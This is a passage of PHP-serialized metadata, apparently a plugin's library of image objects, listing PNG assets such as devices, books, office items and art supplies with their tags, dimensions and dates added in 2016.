16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:71;a:12:{s:2:\"id\";s:2:\"76\";s:6:\"handle\";s:18:\"object_candy_1.png\";s:4:\"name\";s:13:\"Candy Colored\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:72;a:12:{s:2:\"id\";s:2:\"75\";s:6:\"handle\";s:17:\"object_ipad_1.png\";s:4:\"name\";s:16:\"Apple iPad Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:73;a:12:{s:2:\"id\";s:2:\"74\";s:6:\"handle\";s:17:\"object_lamp_2.png\";s:4:\"name\";s:15:\"Black Desk Lamp\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:74;a:12:{s:2:\"id\";s:2:\"73\";s:6:\"handle\";s:18:\"object_canon_1.png\";s:4:\"name\";s:17:\"Canon Camera DLSR\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:75;a:12:{s:2:\"id\";s:2:\"72\";s:6:\"handle\";s:23:\"object_blackberry_2.png\";s:4:\"name\";s:12:\"Blackberry 3\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:76;a:12:{s:2:\"id\";s:2:\"71\";s:6:\"handle\";s:19:\"object_iphone_2.png\";s:4:\"name\";s:19:\"Apple iPhone Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:77;a:12:{s:2:\"id\";s:2:\"70\";s:6:\"handle\";s:17:\"object_ipad_2.png\";s:4:\"name\";s:15:\"Apple iPad Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:78;a:12:{s:2:\"id\";s:2:\"69\";s:6:\"handle\";s:20:\"object_printer_1.png\";s:4:\"name\";s:7:\"Printer\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:79;a:12:{s:2:\"id\";s:2:\"68\";s:6:\"handle\";s:20:\"object_pcmouse_1.png\";s:4:\"name\";s:14:\"Black PC Mouse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:80;a:12:{s:2:\"id\";s:2:\"67\";s:6:\"handle\";s:17:\"object_ipad_3.png\";s:4:\"name\";s:17:\"Apple iPad Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:81;a:12:{s:2:\"id\";s:2:\"66\";s:6:\"handle\";s:17:\"object_lamp_1.png\";s:4:\"name\";s:13:\"Desk Lamp Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:82;a:12:{s:2:\"id\";s:2:\"65\";s:6:\"handle\";s:22:\"object_macscreen_1.png\";s:4:\"name\";s:16:\"Apple Mac Screen\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:83;a:12:{s:2:\"id\";s:2:\"64\";s:6:\"handle\";s:23:\"object_blackberry_3.png\";s:4:\"name\";s:12:\"Blackberry 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:84;a:12:{s:2:\"id\";s:2:\"63\";s:6:\"handle\";s:23:\"object_applewatch_3.png\";s:4:\"name\";s:16:\"Apple Watch Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:85;a:12:{s:2:\"id\";s:2:\"62\";s:6:\"handle\";s:23:\"object_blackberry_1.png\";s:4:\"name\";s:10:\"Blackberry\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:86;a:12:{s:2:\"id\";s:2:\"49\";s:6:\"handle\";s:19:\"object_bottle_1.png\";s:4:\"name\";s:18:\"Brown Glass Bottle\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:87;a:12:{s:2:\"id\";s:2:\"48\";s:6:\"handle\";s:20:\"object_glasses_1.png\";s:4:\"name\";s:19:\"Hipster Glasses Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:88;a:12:{s:2:\"id\";s:2:\"47\";s:6:\"handle\";s:21:\"object_magazine_1.png\";s:4:\"name\";s:14:\"Blank Magazine\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:89;a:12:{s:2:\"id\";s:2:\"46\";s:6:\"handle\";s:28:\"object_leatherdocument_2.png\";s:4:\"name\";s:24:\"Black Leather Document 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:90;a:12:{s:2:\"id\";s:2:\"45\";s:6:\"handle\";s:18:\"object_purse_2.png\";s:4:\"name\";s:13:\"Black Purse 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:91;a:12:{s:2:\"id\";s:2:\"44\";s:6:\"handle\";s:23:\"object_typewriter_1.png\";s:4:\"name\";s:18:\"Retro Typewriter 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:92;a:12:{s:2:\"id\";s:2:\"43\";s:6:\"handle\";s:17:\"object_book_5.png\";s:4:\"name\";s:9:\"Old Books\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:93;a:12:{s:2:\"id\";s:2:\"42\";s:6:\"handle\";s:28:\"object_leatherdocument_1.png\";s:4:\"name\";s:29:\"Black Leather Document Closed\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:94;a:12:{s:2:\"id\";s:2:\"41\";s:6:\"handle\";s:17:\"object_book_4.png\";s:4:\"name\";s:8:\"Old Book\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:95;a:12:{s:2:\"id\";s:2:\"40\";s:6:\"handle\";s:19:\"object_wallet_2.png\";s:4:\"name\";s:22:\"Black Leather Document\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:96;a:12:{s:2:\"id\";s:2:\"39\";s:6:\"handle\";s:18:\"object_quill_2.png\";s:4:\"name\";s:15:\"Quill Feather 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:97;a:12:{s:2:\"id\";s:2:\"38\";s:6:\"handle\";s:24:\"object_eiffeltower_1.png\";s:4:\"name\";s:11:\"Eiffeltower\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:98;a:12:{s:2:\"id\";s:2:\"37\";s:6:\"handle\";s:21:\"object_magazine_2.png\";s:4:\"name\";s:11:\"Open Book 3\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1333\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:99;a:12:{s:2:\"id\";s:2:\"36\";s:6:\"handle\";s:17:\"object_book_1.png\";s:4:\"name\";s:10:\"Blank Book\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:100;a:12:{s:2:\"id\";s:2:\"35\";s:6:\"handle\";s:20:\"object_glasses_2.png\";s:4:\"name\";s:15:\"Hipster Glasses\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:101;a:12:{s:2:\"id\";s:2:\"34\";s:6:\"handle\";s:17:\"object_book_2.png\";s:4:\"name\";s:11:\"Open Book 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:102;a:12:{s:2:\"id\";s:2:\"33\";s:6:\"handle\";s:19:\"object_gloves_1.png\";s:4:\"name\";s:12:\"Black Gloves\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:103;a:12:{s:2:\"id\";s:2:\"32\";s:6:\"handle\";s:23:\"object_typewriter_2.png\";s:4:\"name\";s:16:\"Retro Typewriter\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:104;a:12:{s:2:\"id\";s:2:\"31\";s:6:\"handle\";s:17:\"object_book_3.png\";s:4:\"name\";s:9:\"Open Book\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:105;a:12:{s:2:\"id\";s:2:\"30\";s:6:\"handle\";s:19:\"object_wallet_1.png\";s:4:\"name\";s:12:\"Black Wallet\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:106;a:12:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:18:\"object_purse_1.png\";s:4:\"name\";s:11:\"Black Purse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:107;a:12:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:18:\"object_quill_1.png\";s:4:\"name\";s:13:\"Quill Feather\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:108;a:12:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:19:\"object_artbox_2.png\";s:4:\"name\";s:16:\"Art Box Colors 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:109;a:12:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:18:\"object_cloth_1.png\";s:4:\"name\";s:17:\"Cloth Paint Color\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1400\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:110;a:12:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:21:\"object_brushpot_1.png\";s:4:\"name\";s:9:\"Brush Pot\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"984\";s:6:\"height\";s:3:\"984\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:111;a:12:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:24:\"object_paintbucket_1.png\";s:4:\"name\";s:12:\"Paint Bucket\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1400\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:112;a:12:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:23:\"object_paintbrush_2.png\";s:4:\"name\";s:12:\"Paintbrush 3\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"700\";s:6:\"height\";s:3:\"700\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:113;a:12:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:19:\"object_artbox_1.png\";s:4:\"name\";s:14:\"Art Box Colors\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 